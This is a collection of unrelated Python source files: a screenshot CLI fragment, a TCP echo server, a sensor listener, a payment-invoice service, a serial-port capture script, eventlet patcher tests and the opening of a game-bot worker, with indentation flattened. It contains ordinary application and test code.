ap.add_argument('output', help='Output path of screenshot file in PNG format.')
ap.add_argument('--output-shard', type=int, help='Output shard to write.')
output_shard_group = ap.add_mutually_exclusive_group(required=False)
output_shard_group.add_argument('--num-output-shards',
type=int,
help='Number of output shards.')
output_shard_group.add_argument('--tiles-per-output-shard',
type=int,
help='Number of tiles per output shard.')
ap.add_argument('--checkpoint-interval',
type=float,
default=60,
help='Interval in seconds at which to save checkpoints.')
define_state_modification_args(ap)
define_viewer_args(ap)
define_size_args(ap)
define_tile_args(ap)
define_capture_args(ap)
run(ap.parse_args(args))
if __name__ == '__main__':
main()
|
mult-tcpServer.py
|
#!/usr/bin/env python
import socket
import multiprocessing
#create a function that handles the data received from the client
def clientHandler(client_socket,client_ip, client_port):
data ="test"
while data:
data = client_socket.recv(1024)
print "Received %s from Client %s:%d" %(data, client_ip, client_port)
client_socket.send(data)
client_socket.close()
def main():
processing_list = []
bind_ip="0.0.0.0"
bind_port=9999
tcpServer = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tcpServer.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, True)
tcpServer.bind((bind_ip, bind_port))
tcpServer.listen(5)
# serve forever
while True:
client_socket, (client_ip, client_port) = tcpServer.accept()
process = multiprocessing.Process(target=clientHandler, args=(client_socket, client_ip, client_port))
process.start()
processing_list.append(process)
if __name__ == "__main__":
main()
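# A minimal client sketch for manual testing (assumes the echo server above is
# running locally on port 9999; the payload is an arbitrary example):
#
#   import socket
#   c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#   c.connect(("127.0.0.1", 9999))
#   c.send(b"hello")
#   print(c.recv(1024))
#   c.close()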
|
listener.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author: Vargas Hector <vargash1>
# @Date: Sunday, April 10th 2016, 11:18:37 pm
# @Email: vargash1@wit.edu
# @Last modified by: vargash1
# @Last modified time: Tuesday, April 12th 2016, 5:06:34 am
import multiprocessing
from vraspi import ultrasonic, motion, light, temp, noise, log
class SensorListener:
def __init__(self, logger, queue):
self.msgqueue = queue
self.ultrasonicProcess = None
self.motionProcess = None
self.lightProcess = None
self.tempProcess = None
self.soundProcess = None
self.logger = logger
def initialize(self):
ultratest = ultrasonic.UltraSonicSensor(self.msgqueue, self.logger)
motiontest = motion.MotionSensor(self.msgqueue, self.logger)
lighttest = light.LightSensor(self.msgqueue, self.logger)
self.tempProcess = temp.TempReader(self.msgqueue, self.logger)
soundtest = noise.NoiseSensor(self.msgqueue, self.logger)
self.motionProcess = multiprocessing.Process(target=motiontest.detect_Motion)
self.ultrasonicProcess = multiprocessing.Process(target=ultratest.detect_dist)
self.lightProcess = multiprocessing.Process(target=lighttest.detect_light)
self.soundProcess = multiprocessing.Process(target=soundtest.detect_sound)
def runProcesses(self):
self.ultrasonicProcess.start()
self.motionProcess.start()
self.lightProcess.start()
self.soundProcess.start()
def getQueueMessage(self):
return self.msgqueue.get()
def execute(self):
self.initialize()
self.runProcesses()
"""
No need to constantly read tempratures!
"""
def getTempReading(self):
return self.tempProcess.get_temp()
def main():
lels = log.VRaspLog()
lels.initLogger()
msgqueue = multiprocessing.Queue()
listener = SensorListener(lels, msgqueue)
listener.execute()
while True:
msg = listener.getQueueMessage()
if msg is not None:
print(msg)
else:
print("No queue messages!")
break
if __name__ == "__main__":
main()
|
payment_service.py
|
# Copyright © 2019 Province of British Columbia
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Service class to control all the operations related to Payment."""
from threading import Thread
from typing import Any, Dict, Tuple
from flask import copy_current_request_context, current_app
from pay_api.exceptions import BusinessException
from pay_api.factory.payment_system_factory import PaymentSystemFactory
from pay_api.utils.constants import EDIT_ROLE
from pay_api.utils.enums import PaymentStatus, InvoiceStatus, LineItemStatus, InvoiceReferenceStatus, \
PaymentMethod
from pay_api.utils.errors import Error
from pay_api.utils.util import get_str_by_path
from .base_payment_system import PaymentSystemService
from .fee_schedule import FeeSchedule
from .invoice import Invoice
from .invoice_reference import InvoiceReference
from .payment import Payment
from .payment_account import PaymentAccount
from .payment_line_item import PaymentLineItem
from .payment_transaction import PaymentTransaction
class PaymentService: # pylint: disable=too-few-public-methods
"""Service to manage Payment related operations."""
@classmethod
def create_invoice(cls, payment_request: Tuple[Dict[str, Any]], authorization: Tuple[Dict[str, Any]]) -> Dict:
# pylint: disable=too-many-locals, too-many-statements
"""Create payment related records.
Does the following:
1. Calculate the fees based on the filing types received.
2. Check if the payment account exists,
2.1 If yes, use the one from database.
2.2 Else create one in payment system and update database.
3. Create payment record in database and flush.
4. Create invoice record in database and flush.
5. Create payment line items in database and flush.
6. Create invoice in payment system;
6.1 If successful update the invoice table with references from payment system.
6.1.1 If that fails, adjust the invoice to zero and roll back the transaction.
6.2 If it fails, roll back the transaction.
"""
current_app.logger.debug('<create_invoice %s', payment_request)
business_info = payment_request.get('businessInfo')
filing_info = payment_request.get('filingInfo')
account_info = payment_request.get('accountInfo', None)
filing_id = filing_info.get('filingIdentifier', None)
folio_number = filing_info.get('folioNumber', get_str_by_path(authorization, 'business/folioNumber'))
corp_type = business_info.get('corpType', None)
payment_account = cls._find_payment_account(authorization)
payment_method = _get_payment_method(payment_request, payment_account)
bcol_account = cls._get_bcol_account(account_info, payment_account)
# Calculate the fees
current_app.logger.debug('Calculate the fees')
fees = _calculate_fees(corp_type, filing_info)
# Create payment system instance from factory
current_app.logger.debug('Creating PaymentSystemService impl')
pay_service: PaymentSystemService = PaymentSystemFactory.create(
payment_method=payment_method,
corp_type=corp_type,
fees=sum(fee.total for fee in fees),
account_info=account_info,
payment_account=payment_account
)
pay_system_invoice: Dict[str, Any] = None
invoice: Invoice = None
try:
current_app.logger.debug('Creating Invoice record')
invoice = Invoice()
invoice.bcol_account = bcol_account
invoice.payment_account_id = payment_account.id
invoice.cfs_account_id = payment_account.cfs_account_id
invoice.invoice_status_code = pay_service.get_default_invoice_status()
# TODO Change based on decision, whether to apply service fees for each line or not.
# For now add up the service fee on each fee schedule
invoice.service_fees = sum(fee.service_fees for fee in fees) if fees else 0
invoice.total = sum(fee.total for fee in fees) if fees else 0
invoice.paid = 0
invoice.refund = 0
invoice.routing_slip = get_str_by_path(account_info, 'routingSlip')
invoice.filing_id = filing_id
invoice.dat_number = get_str_by_path(account_info, 'datNumber')
invoice.folio_number = folio_number
invoice.business_identifier = business_info.get('businessIdentifier')
invoice.payment_method_code = pay_service.get_payment_method_code()
invoice.corp_type_code = corp_type
invoice = invoice.flush()
line_items = []
for fee in fees:
current_app.logger.debug('Creating line items')
line_items.append(PaymentLineItem.create(invoice.id, fee))
current_app.logger.debug('Handing off to payment system to create invoice')
invoice_reference = pay_service.create_invoice(payment_account, line_items, invoice,
corp_type_code=invoice.corp_type_code)
current_app.logger.debug('Updating invoice record')
invoice.commit()
pay_service.complete_post_invoice(invoice, invoice_reference)
invoice = Invoice.find_by_id(invoice.id, skip_auth_check=True)
except Exception as e: # NOQA pylint: disable=broad-except
current_app.logger.error('Rolling back as error occurred!')
current_app.logger.error(e)
if invoice:
invoice.rollback()
if pay_system_invoice:
pay_service.cancel_invoice(
payment_account,
pay_system_invoice.get('invoice_number'),
)
raise
current_app.logger.debug('>create_invoice')
return invoice.asdict(include_dynamic_fields=True)
@classmethod
def _find_payment_account(cls, authorization):
# find payment account
payment_account: PaymentAccount = PaymentAccount.find_account(authorization)
# If there is no payment_account it must be a request with no account (NR, Staff payment etc.)
# and invoked using a service account or a staff token
if not payment_account:
payment_method = get_str_by_path(authorization,
'account/paymentInfo/methodOfPayment') or _get_default_payment()
payment_account = PaymentAccount.create(
dict(
accountId=get_str_by_path(authorization, 'account/id'),
paymentInfo=dict(
methodOfPayment=payment_method,
billable=True)
)
)
return payment_account
@classmethod
def _get_bcol_account(cls, account_info, payment_account: PaymentAccount):
if account_info and account_info.get('bcolAccountNumber', None):
bcol_account = account_info.get('bcolAccountNumber')
else:
bcol_account = payment_account.bcol_account
return bcol_account
@classmethod
def update_invoice(cls, invoice_id: int, payment_request: Tuple[Dict[str, Any]], is_apply_credit: bool = False):
"""Update invoice related records."""
current_app.logger.debug('<update_invoice')
invoice: Invoice = Invoice.find_by_id(invoice_id, skip_auth_check=False)
# If the call is to apply credit, apply credit and release records.
if is_apply_credit:
credit_balance: float = 0
payment_account: PaymentAccount = PaymentAccount.find_by_id(invoice.payment_account_id)
invoice_balance = invoice.total - (invoice.paid or 0)
if (payment_account.credit or 0) >= invoice_balance:
pay_service: PaymentSystemService = PaymentSystemFactory.create_from_payment_method(
invoice.payment_method_code)
# Only release records, as the actual status change should happen during reconciliation.
pay_service.apply_credit(invoice)
credit_balance = payment_account.credit - invoice_balance
invoice.paid = invoice.total
invoice.save()
elif (payment_account.credit or 0) <= invoice_balance:
invoice.paid = (invoice.paid or 0) + payment_account.credit
invoice.save()
payment_account.credit = credit_balance
payment_account.save()
else:
payment_method = get_str_by_path(payment_request, 'paymentInfo/methodOfPayment')
is_not_currently_on_ob = invoice.payment_method_code != PaymentMethod.ONLINE_BANKING.value
is_not_changing_to_cc = payment_method not in (PaymentMethod.CC.value, PaymentMethod.DIRECT_PAY.value)
# can patch only if the current payment method is OB
if is_not_currently_on_ob or is_not_changing_to_cc:
raise BusinessException(Error.INVALID_REQUEST)
# check if it has any invoice references already created
# if there is any invoice ref , send them to the invoiced credit card flow
invoice_reference = InvoiceReference.find_active_reference_by_invoice_id(invoice.id)
if invoice_reference:
invoice.payment_method_code = PaymentMethod.CC.value
else:
pay_service: PaymentSystemService = PaymentSystemFactory.create_from_payment_method(
PaymentMethod.DIRECT_PAY.value)
payment_account = PaymentAccount.find_by_id(invoice.payment_account_id)
pay_service.create_invoice(payment_account, invoice.payment_line_items, invoice,
corp_type_code=invoice.corp_type_code)
invoice.payment_method_code = PaymentMethod.DIRECT_PAY.value
invoice.save()
current_app.logger.debug('>update_invoice')
return invoice.asdict()
@classmethod
def delete_invoice(cls, invoice_id: int): # pylint: disable=too-many-locals,too-many-statements
"""Delete invoice related records.
Does the following:
1. Check if payment is eligible to be deleted.
2. Mark the payment and invoices records as deleted.
3. Publish message to queue
"""
current_app.logger.debug('<delete_invoice')
# update transaction function will update the status from PayBC
_update_active_transactions(invoice_id)
invoice: Invoice = Invoice.find_by_id(invoice_id, skip_auth_check=True)
# Create the payment system implementation
pay_service: PaymentSystemService = PaymentSystemFactory.create_from_payment_method(invoice.payment_method_code)
# set payment status as deleted
payment = Payment.find_payment_for_invoice(invoice_id)
_check_if_invoice_can_be_deleted(invoice, payment)
if payment:
payment.payment_status_code = PaymentStatus.DELETED.value
payment.flush()
# Cancel invoice
invoice_reference = InvoiceReference.find_active_reference_by_invoice_id(invoice.id)
payment_account = PaymentAccount.find_by_id(invoice.payment_account_id)
if invoice_reference:
pay_service.cancel_invoice(payment_account=payment_account, inv_number=invoice_reference.invoice_number)
invoice.invoice_status_code = InvoiceStatus.DELETED.value
for line in invoice.payment_line_items:
line.line_item_status_code = LineItemStatus.CANCELLED.value
invoice_reference.status_code = InvoiceReferenceStatus.CANCELLED.value
invoice_reference.flush()
invoice.save()
current_app.logger.debug('>delete_invoice')
@classmethod
def accept_delete(cls, invoice_id: int): # pylint: disable=too-many-locals,too-many-statements
"""Mark payment related records to be deleted."""
current_app.logger.debug('<accept_delete')
invoice: Invoice = Invoice.find_by_id(invoice_id, one_of_roles=[EDIT_ROLE])
_check_if_invoice_can_be_deleted(invoice)
invoice.payment_status_code = InvoiceStatus.DELETE_ACCEPTED.value
invoice.save()
@copy_current_request_context
def run_delete():
"""Call delete payment."""
PaymentService.delete_invoice(invoice_id)
current_app.logger.debug('Starting thread to delete invoice.')
thread = Thread(target=run_delete)
thread.start()
current_app.logger.debug('>accept_delete')
def _calculate_fees(corp_type, filing_info):
"""Calculate and return the fees based on the filing type codes."""
fees = []
service_fee_applied: bool = False
for filing_type_info in filing_info.get('filingTypes'):
current_app.logger.debug('Getting fees for {} '.format(filing_type_info.get('filingTypeCode')))
fee: FeeSchedule = FeeSchedule.find_by_corp_type_and_filing_type(
corp_type=corp_type,
filing_type_code=filing_type_info.get('filingTypeCode', None),
valid_date=filing_info.get('date', None),
jurisdiction=None,
is_priority=filing_type_info.get('priority'),
is_future_effective=filing_type_info.get('futureEffective'),
waive_fees=filing_type_info.get('waiveFees'),
quantity=filing_type_info.get('quantity')
)
# If service fee is already applied, do not charge again.
if service_fee_applied:
fee.service_fees = 0
elif fee.service_fees > 0:
service_fee_applied = True
if filing_type_info.get('filingDescription'):
fee.description = filing_type_info.get('filingDescription')
fees.append(fee)
return fees
def _update_active_transactions(invoice_id: int):
# update active transactions
current_app.logger.debug('<_update_active_transactions')
transaction: PaymentTransaction = PaymentTransaction.find_active_by_invoice_id(invoice_id)
if transaction:
# check existing payment status in PayBC;
PaymentTransaction.update_transaction(transaction.id, pay_response_url=None)
def _check_if_invoice_can_be_deleted(invoice: Invoice, payment: Payment = None):
if invoice.invoice_status_code in (InvoiceStatus.PAID.value, InvoiceStatus.DELETED.value,
InvoiceStatus.APPROVED.value):
raise BusinessException(Error.COMPLETED_PAYMENT)
if payment and payment.payment_status_code in (PaymentStatus.COMPLETED.value, PaymentStatus.DELETED.value):
raise BusinessException(Error.COMPLETED_PAYMENT)
def _get_payment_method(payment_request: Dict, payment_account: PaymentAccount):
# If no methodOfPayment is provided, use the one against the payment account table.
payment_method = get_str_by_path(payment_request, 'paymentInfo/methodOfPayment')
if not payment_method:
payment_method = payment_account.payment_method
if not payment_method:
payment_method = _get_default_payment()
return payment_method
def _get_default_payment() -> str:
return PaymentMethod.DIRECT_PAY.value
|
uart_file_capture.py
|
## Script to capture files or incoming data over a serial port
from functions.serial_ports import *
import serial
import threading
import time
import sys
import os
import hashlib
## Parameters
# BAUDRATE = 1041666
BAUDRATE = 115200
DATASIZE = 26240 # bytes
PORT = 'COM30'
in_buf = bytes('', 'utf-8') # incoming data buffer; the Windows driver limit
# is 4096 bytes, so data is accumulated here instead
## Thread control
t = "dummy"
run = True
# worker thread function
def worker(dummy, ser):
global in_buf
global run
reporte_tiempo = True
timer_iniciado = False
print("worker starting...")
while(run):
in_buf += ser.read(ser.inWaiting())
lenbuf = len(in_buf)
if (lenbuf > 0 and timer_iniciado == False):
t_init = time.perf_counter()
timer_iniciado = True
print("tic...")
if (lenbuf == DATASIZE and reporte_tiempo == True):
t_end = time.perf_counter()
print("transfer time:", t_end - t_init)
reporte_tiempo = False
print("worker stop...")
# main function
def main():
global in_buf
global t
ser = serial.Serial(PORT, BAUDRATE, timeout = 1)
ser.reset_input_buffer() # clear the input buffer just in case
print("** Buffer Cleaned **")
# Thread that keeps draining incoming bytes into the buffer
t = threading.Thread(target=worker, args = (0, ser))
t.start()
# Loop that checks how many bytes have accumulated in the userspace buffer
n_datos_old = 0
timeout_count = 0 # counts seconds without receiving new data
while(True):
time.sleep(1)
n_datos = len(in_buf)
if (n_datos != n_datos_old):
print(n_datos, " en el buffer", end = '\r')
# rutina que revisa si se terminó la recepción de datos, se genera un
# se genera un timeout counter para salir del script
elif (n_datos == n_datos_old) & (n_datos > 0):
timeout_count += 1
n_datos_old = n_datos
if(timeout_count == 3):
exit_script()
def exit_script():
global run
global t
print("\nInterrupted")
run = False
t.join()
print("****************************")
print("Data MD5 Hash")
hash_object = hashlib.md5(in_buf)
print(hash_object.hexdigest())
print("****************************")
file = open("frame_received.jpg", "wb")
file.write(in_buf)
file.close()
try:
sys.exit(0)
except SystemExit:
os._exit(0)
# main()
if __name__ == '__main__':
try:
main()
except KeyboardInterrupt:
exit_script()
|
patcher_test.py
|
import os
import shutil
import sys
import tempfile
import six
import tests
base_module_contents = """
import socket
import urllib
print("base {0} {1}".format(socket, urllib))
"""
patching_module_contents = """
from eventlet.green import socket
from eventlet.green import urllib
from eventlet import patcher
print('patcher {0} {1}'.format(socket, urllib))
patcher.inject('base', globals(), ('socket', socket), ('urllib', urllib))
del patcher
"""
import_module_contents = """
import patching
import socket
print("importing {0} {1} {2} {3}".format(patching, socket, patching.socket, patching.urllib))
"""
class ProcessBase(tests.LimitedTestCase):
TEST_TIMEOUT = 3 # starting processes is time-consuming
def setUp(self):
super(ProcessBase, self).setUp()
self._saved_syspath = sys.path
self.tempdir = tempfile.mkdtemp('_patcher_test')
def tearDown(self):
super(ProcessBase, self).tearDown()
sys.path = self._saved_syspath
shutil.rmtree(self.tempdir)
def write_to_tempfile(self, name, contents):
filename = os.path.join(self.tempdir, name)
if not filename.endswith('.py'):
filename = filename + '.py'
with open(filename, "w") as fd:
fd.write(contents)
def launch_subprocess(self, filename):
path = os.path.join(self.tempdir, filename)
output = tests.run_python(path)
if six.PY3:
output = output.decode('utf-8')
separator = '\n'
else:
separator = b'\n'
lines = output.split(separator)
return output, lines
def run_script(self, contents, modname=None):
if modname is None:
modname = "testmod"
self.write_to_tempfile(modname, contents)
return self.launch_subprocess(modname)
class ImportPatched(ProcessBase):
def test_patch_a_module(self):
self.write_to_tempfile("base", base_module_contents)
self.write_to_tempfile("patching", patching_module_contents)
self.write_to_tempfile("importing", import_module_contents)
output, lines = self.launch_subprocess('importing.py')
assert lines[0].startswith('patcher'), repr(output)
assert lines[1].startswith('base'), repr(output)
assert lines[2].startswith('importing'), repr(output)
assert 'eventlet.green.socket' in lines[1], repr(output)
assert 'eventlet.green.urllib' in lines[1], repr(output)
assert 'eventlet.green.socket' in lines[2], repr(output)
assert 'eventlet.green.urllib' in lines[2], repr(output)
assert 'eventlet.green.httplib' not in lines[2], repr(output)
def test_import_patched_defaults():
tests.run_isolated('patcher_import_patched_defaults.py')
def test_import_patched_handles_sub_modules():
tests.run_isolated('test_sub_module_in_import_patched/test.py')
class MonkeyPatch(ProcessBase):
def test_patched_modules(self):
new_mod = """
from eventlet import patcher
patcher.monkey_patch()
import socket
try:
import urllib.request as urllib
except ImportError:
import urllib
print("newmod {0} {1}".format(socket.socket, urllib.socket.socket))
"""
self.write_to_tempfile("newmod", new_mod)
output, lines = self.launch_subprocess('newmod.py')
assert lines[0].startswith('newmod'), repr(output)
self.assertEqual(lines[0].count('GreenSocket'), 2, repr(output))
def test_early_patching(self):
new_mod = """
from eventlet import patcher
patcher.monkey_patch()
import eventlet
eventlet.sleep(0.01)
print("newmod")
"""
self.write_to_tempfile("newmod", new_mod)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 2, repr(output))
assert lines[0].startswith('newmod'), repr(output)
def test_late_patching(self):
new_mod = """
import eventlet
eventlet.sleep(0.01)
from eventlet import patcher
patcher.monkey_patch()
eventlet.sleep(0.01)
print("newmod")
"""
self.write_to_tempfile("newmod", new_mod)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 2, repr(output))
assert lines[0].startswith('newmod'), repr(output)
def test_typeerror(self):
new_mod = """
from eventlet import patcher
patcher.monkey_patch(finagle=True)
"""
self.write_to_tempfile("newmod", new_mod)
output, lines = self.launch_subprocess('newmod.py')
assert lines[-2].startswith('TypeError'), repr(output)
assert 'finagle' in lines[-2], repr(output)
def assert_boolean_logic(self, call, expected, not_expected=''):
expected_list = ", ".join(['"%s"' % x for x in expected.split(',') if len(x)])
not_expected_list = ", ".join(['"%s"' % x for x in not_expected.split(',') if len(x)])
new_mod = """
from eventlet import patcher
%s
for mod in [%s]:
assert patcher.is_monkey_patched(mod), mod
for mod in [%s]:
assert not patcher.is_monkey_patched(mod), mod
print("already_patched {0}".format(",".join(sorted(patcher.already_patched.keys()))))
""" % (call, expected_list, not_expected_list)
self.write_to_tempfile("newmod", new_mod)
output, lines = self.launch_subprocess('newmod.py')
ap = 'already_patched'
assert lines[0].startswith(ap), repr(output)
patched_modules = lines[0][len(ap):].strip()
# psycopg might or might not be patched based on installed modules
patched_modules = patched_modules.replace("psycopg,", "")
# ditto for MySQLdb
patched_modules = patched_modules.replace("MySQLdb,", "")
self.assertEqual(
patched_modules, expected,
"Logic:%s\nExpected: %s != %s" % (call, expected, patched_modules))
def test_boolean(self):
self.assert_boolean_logic("patcher.monkey_patch()",
'os,select,socket,subprocess,thread,time')
def test_boolean_all(self):
self.assert_boolean_logic("patcher.monkey_patch(all=True)",
'os,select,socket,subprocess,thread,time')
def test_boolean_all_single(self):
self.assert_boolean_logic("patcher.monkey_patch(all=True, socket=True)",
'os,select,socket,subprocess,thread,time')
def test_boolean_all_negative(self):
self.assert_boolean_logic(
"patcher.monkey_patch(all=False, socket=False, select=True)",
'select')
def test_boolean_single(self):
self.assert_boolean_logic("patcher.monkey_patch(socket=True)",
'socket')
def test_boolean_double(self):
self.assert_boolean_logic("patcher.monkey_patch(socket=True, select=True)",
'select,socket')
def test_boolean_negative(self):
self.assert_boolean_logic("patcher.monkey_patch(socket=False)",
'os,select,subprocess,thread,time')
def test_boolean_negative2(self):
self.assert_boolean_logic("patcher.monkey_patch(socket=False, time=False)",
'os,select,subprocess,thread')
def test_conflicting_specifications(self):
self.assert_boolean_logic("patcher.monkey_patch(socket=False, select=True)",
'select')
test_monkey_patch_threading = """
def test_monkey_patch_threading():
tickcount = [0]
def tick():
import six
for i in six.moves.range(1000):
tickcount[0] += 1
eventlet.sleep()
def do_sleep():
tpool.execute(time.sleep, 0.5)
eventlet.spawn(tick)
w1 = eventlet.spawn(do_sleep)
w1.wait()
print(tickcount[0])
assert tickcount[0] > 900
tpool.killall()
"""
class Tpool(ProcessBase):
TEST_TIMEOUT = 3
@tests.skip_with_pyevent
def test_simple(self):
new_mod = """
import eventlet
from eventlet import patcher
patcher.monkey_patch()
from eventlet import tpool
print("newmod {0}".format(tpool.execute(len, "hi")))
print("newmod {0}".format(tpool.execute(len, "hi2")))
tpool.killall()
"""
self.write_to_tempfile("newmod", new_mod)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 3, output)
assert lines[0].startswith('newmod'), repr(output)
assert '2' in lines[0], repr(output)
assert '3' in lines[1], repr(output)
@tests.skip_with_pyevent
def test_unpatched_thread(self):
new_mod = """import eventlet
eventlet.monkey_patch(time=False, thread=False)
from eventlet import tpool
import time
"""
new_mod += test_monkey_patch_threading
new_mod += "\ntest_monkey_patch_threading()\n"
self.write_to_tempfile("newmod", new_mod)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 2, lines)
@tests.skip_with_pyevent
def test_patched_thread(self):
new_mod = """import eventlet
eventlet.monkey_patch(time=False, thread=True)
from eventlet import tpool
import time
"""
new_mod += test_monkey_patch_threading
new_mod += "\ntest_monkey_patch_threading()\n"
self.write_to_tempfile("newmod", new_mod)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 2, "\n".join(lines))
def test_subprocess_after_monkey_patch():
code = '''\
import sys
import eventlet
eventlet.monkey_patch()
from eventlet.green import subprocess
subprocess.Popen([sys.executable, '-c', ''], stdin=subprocess.PIPE).wait()
print('pass')
'''
output = tests.run_python(
path=None,
args=['-c', code],
)
assert output.rstrip() == b'pass'
class Threading(ProcessBase):
def test_orig_thread(self):
new_mod = """import eventlet
eventlet.monkey_patch()
from eventlet import patcher
import threading
_threading = patcher.original('threading')
def test():
print(repr(threading.currentThread()))
t = _threading.Thread(target=test)
t.start()
t.join()
print(len(threading._active))
print(len(_threading._active))
"""
self.write_to_tempfile("newmod", new_mod)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 4, "\n".join(lines))
assert lines[0].startswith('<Thread'), lines[0]
assert lines[1] == '1', lines
assert lines[2] == '1', lines
def test_tpool(self):
new_mod = """import eventlet
eventlet.monkey_patch()
from eventlet import tpool
import threading
def test():
print(repr(threading.currentThread()))
tpool.execute(test)
print(len(threading._active))
"""
self.write_to_tempfile("newmod", new_mod)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 3, "\n".join(lines))
assert lines[0].startswith('<Thread'), lines[0]
self.assertEqual(lines[1], "1", lines[1])
def test_greenlet(self):
new_mod = """import eventlet
eventlet.monkey_patch()
from eventlet import event
import threading
evt = event.Event()
def test():
print(repr(threading.currentThread()))
evt.send()
eventlet.spawn_n(test)
evt.wait()
print(len(threading._active))
"""
self.write_to_tempfile("newmod", new_mod)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 3, "\n".join(lines))
assert lines[0].startswith('<_MainThread'), lines[0]
self.assertEqual(lines[1], "1", lines[1])
def test_greenthread(self):
new_mod = """import eventlet
eventlet.monkey_patch()
import threading
def test():
print(repr(threading.currentThread()))
t = eventlet.spawn(test)
t.wait()
print(len(threading._active))
"""
self.write_to_tempfile("newmod", new_mod)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 3, "\n".join(lines))
assert lines[0].startswith('<_GreenThread'), lines[0]
self.assertEqual(lines[1], "1", lines[1])
def test_keyerror(self):
new_mod = """import eventlet
eventlet.monkey_patch()
"""
self.write_to_tempfile("newmod", new_mod)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 1, "\n".join(lines))
class Os(ProcessBase):
def test_waitpid(self):
new_mod = """import subprocess
import eventlet
eventlet.monkey_patch(all=False, os=True)
process = subprocess.Popen("sleep 0.1 && false", shell=True)
print(process.wait())"""
self.write_to_tempfile("newmod", new_mod)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 2, "\n".join(lines))
self.assertEqual('1', lines[0], repr(output))
class GreenThreadWrapper(ProcessBase):
prologue = """import eventlet
eventlet.monkey_patch()
import threading
def test():
t = threading.currentThread()
"""
epilogue = """
t = eventlet.spawn(test)
t.wait()
"""
def test_join(self):
self.write_to_tempfile("newmod", self.prologue + """
def test2():
global t2
t2 = threading.currentThread()
eventlet.spawn(test2)
""" + self.epilogue + """
print(repr(t2))
t2.join()
""")
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 2, "\n".join(lines))
assert lines[0].startswith('<_GreenThread'), lines[0]
def test_name(self):
self.write_to_tempfile("newmod", self.prologue + """
print(t.name)
print(t.getName())
print(t.get_name())
t.name = 'foo'
print(t.name)
print(t.getName())
print(t.get_name())
t.setName('bar')
print(t.name)
print(t.getName())
print(t.get_name())
""" + self.epilogue)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 10, "\n".join(lines))
for i in range(0, 3):
self.assertEqual(lines[i], "GreenThread-1", lines[i])
for i in range(3, 6):
self.assertEqual(lines[i], "foo", lines[i])
for i in range(6, 9):
self.assertEqual(lines[i], "bar", lines[i])
def test_ident(self):
self.write_to_tempfile("newmod", self.prologue + """
print(id(t._g))
print(t.ident)
""" + self.epilogue)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 3, "\n".join(lines))
self.assertEqual(lines[0], lines[1])
def test_is_alive(self):
self.write_to_tempfile("newmod", self.prologue + """
print(t.is_alive())
print(t.isAlive())
""" + self.epilogue)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 3, "\n".join(lines))
self.assertEqual(lines[0], "True", lines[0])
self.assertEqual(lines[1], "True", lines[1])
def test_is_daemon(self):
self.write_to_tempfile("newmod", self.prologue + """
print(t.is_daemon())
print(t.isDaemon())
""" + self.epilogue)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 3, "\n".join(lines))
self.assertEqual(lines[0], "True", lines[0])
self.assertEqual(lines[1], "True", lines[1])
def test_patcher_existing_locks_early():
tests.run_isolated('patcher_existing_locks_early.py')
def test_patcher_existing_locks_late():
tests.run_isolated('patcher_existing_locks_late.py')
def test_patcher_existing_locks_locked():
tests.run_isolated('patcher_existing_locks_locked.py')
@tests.skip_if_CRLock_exist
def test_patcher_existing_locks_unlocked():
tests.run_isolated('patcher_existing_locks_unlocked.py')
def test_importlib_lock():
tests.run_isolated('patcher_importlib_lock.py')
def test_threading_condition():
tests.run_isolated('patcher_threading_condition.py')
def test_threading_join():
tests.run_isolated('patcher_threading_join.py')
def test_socketserver_selectors():
tests.run_isolated('patcher_socketserver_selectors.py')
def test_blocking_select_methods_are_deleted():
tests.run_isolated('patcher_blocking_select_methods_are_deleted.py')
def test_regular_file_readall():
tests.run_isolated('regular_file_readall.py')
def test_threading_current():
tests.run_isolated('patcher_threading_current.py')
def test_threadpoolexecutor():
tests.run_isolated('patcher_threadpoolexecutor.py')
|
worker.py
|
import argparse
import copy
import os
import sys
import os.path
import glob
import json
import random
import shutil
import subprocess
import tempfile
import traceback
import logging
import uuid
import socket
from time import sleep, gmtime, strftime
import datetime
import threading
from flask import Flask
import archive
import backend
import compiler
import util
# Flask start
app = Flask(__name__)
# Log it real good
LOG_FILENAME = "worker-log-{}.data".format(uuid.uuid4())
# Constraints on # and size of log files read from bots
MAX_LOG_FILES = 1
MAX_LOG_FILE_SIZE = 50 * 1024 # 50 KiB
# Used to ensure system is running (watchdog timer)
TIME = datetime.datetime.now()
TIME_THRESHOLD = 60 * 18 # 18 mins in s
# Used by Watchdog timer to keep time
LOCK = threading.Lock()
# Where to create temporary directories
TEMP_DIR = os.getcwd()
# The game environment executable.
ENVIRONMENT = "halite"
# The script used to start the bot. This is either user-provided or
# created by compile.py.
RUNFILE = "run.sh"
# The command used to run the bot. On the outside is a cgroup limiting CPU
# and memory access. On the inside, we run the bot as a user so that it may
# not overwrite files. The worker image has a built-in iptables rule denying
# network access to this user as well.
